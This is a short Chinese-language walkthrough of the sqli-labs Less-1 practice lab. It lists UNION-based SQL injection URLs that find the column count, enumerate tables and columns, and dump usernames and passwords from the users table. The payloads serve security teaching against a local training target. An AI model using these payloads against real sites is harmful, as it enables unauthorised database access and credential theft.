SQL注入实例（sqli-labs/less-1）

初始网页

从网页可知传递的参数名为 id，并且为数字类型

1、得知数据表有多少列

1.1 使用联合查询查找列数（效率低）

http://localhost/sqli-labs-master/Less-1/?id=1' union select 1,2 --+

1.2 使用order by查找列数（效率高）

http://localhost/sqli-labs-master/Less-1/?id=1' order by 3 --+

2、查看回显位置

?id=-1' union select 1,2,3 --+

3、查询当前数据库名

?id=-1' union select 1,database(),3 --+

4、查询当前表名

？id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

5、查询列名

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

6、查询最终数据

?id=-1' union select 1,group_concat(username,0x3a,password),3 from users --+

其他

查询当前数据库版本

?id=-1' union select 1,version(),3 --+

查询当前登录用户

?id=-1' union select 1,user(),3 --+